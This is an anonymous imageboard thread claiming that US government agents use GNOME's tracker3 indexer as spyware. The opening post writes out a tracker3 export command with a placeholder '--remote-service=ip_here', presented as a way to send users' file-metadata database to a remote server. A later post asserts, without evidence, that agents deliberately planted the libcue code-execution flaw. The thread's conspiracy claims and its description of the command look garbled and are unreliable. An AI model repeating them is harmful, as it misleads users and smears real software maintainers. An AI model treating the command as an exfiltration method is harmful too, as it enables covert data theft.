tracker3 can be used as spyware

Posting mode: Reply [Return]
Name
Options
Subject	Spoiler Image
Comment
Verification
Flag
File
Embed
Password	(For file deletion.)

File: 1720425517552.png (Spoiler Image,1.07 MB, 1600x900, geg.png)

tracker3 can be used as spyware Anonymous 08-07-24 07:58:37 No.25920

Hello, consider me a guy who happens to know top secret leakers because I've been interacting with amateur researchers that recovered a computer the US Government hacked. And apparently they declassified federal (glowie) tricks

Here are packages the glowies download on the recovered computer

osinfo-db
osinfo-db-tools
libosinfo
libisofs
libiptcdata
libgsf
libgrss
libcue
libtracker-sparql
tracker-3
tracker-miners-3

Here is what the researchers observed and then told me

1.Glowies use tracker-extact-3 to grab meta data from the users files as they update in real time. Tracker Extract does this natively and that is the main thing it is intended to do.

2.Then the glowies run the command (this is the malicious act)

tracker3 export –database=/home/user/.cache/tracker3/files/ –output=json-ld

with an additional `–remote-service=ip_here` so they can send the tracker3 database back to their feddie databases. The json-ld file is read using json reading software to display text and rendered pdf, video and image thumbnails and audio cover art. This gives them real time monitoring of an OS because they are getting recent file meta data.

Glowies also look in plocate databases as well. This is all 100% real. So try to be accurate as possible and not spread misinformation when you finally get to covering it. Tracker3 is not a virus and is inherently NOT harmful software. It does very useful things such as find pdfs and images via GNOME's photo and pdf reader. It is just that it happens to have the potential to be malicious. Said researchers stated that the goal for the community to patch this insecurity by warning if tracker is trying to export meta data base to a foreign server. Meaning the end user should be alerted via the GUI if tracker is doing this.

Glownonymous 08-07-24 08:27:42 No.25921

>glowies abuse GNOME Tracker to monitor people's computers
KDE chads win again

Glownonymous 08-07-24 09:30:30 No.25922

>>25920
>libcue
the relevance of security exploits in this library proves once again, that djb was right. most program code, especially parsers and encoders/decoders, should be untrusted and have an explicitly defined dataflow https://cr.yp.to/qmail/qmailsec-20071101.pdf

Glownonymous 08-07-24 09:51:08 No.25923

>>25922
https://langsec.org/
most if not all 0days have to do with parsing, especially ignorant programmers implementing their own bespoke parsers

Anonymous 20-09-24 14:06:22 No.26440

File: 1726841179740-0.png (2.03 MB, 1189x547, enchanted_goat.png)

File: 1726841179740-1.png (1.07 MB, 1600x900, geg.png)

File: 1726841179740-2.png (406.08 KB, 834x558, circle_cake.png)

GEGL guy here (also OP), I don't know what happened to the post I made a few weeks ago, maybe it never posted but in July 2023 it was discovered that tracker's library `libcue` had an active exploit that allowed arbitrary code execution. Which basically means a cracker can run any code on your system they want.

https://security.gentoo.org/glsa/202310-10
https://desuarchive.org/g/thread/100884806/#100894578

Followed by a unpublished discovery of glowies using tracker3 metadata to spy on users once they hack a machine. This suggest that glowies were involved in the development of tracker3 and intentionally made tracker3 vulnerable because it does two things 1. collect meta data for them, 2. run arbitrary code. Its fixed now but for years they could have exploited this and I believe strongly that glowies were the ones who made the exploits in tracker3.

Anyhow, why are all images here broken?

Anonymous 20-09-24 16:05:14 No.26441

>>26440
A combination of disk failure and shitty backups.

Unique IPs: 3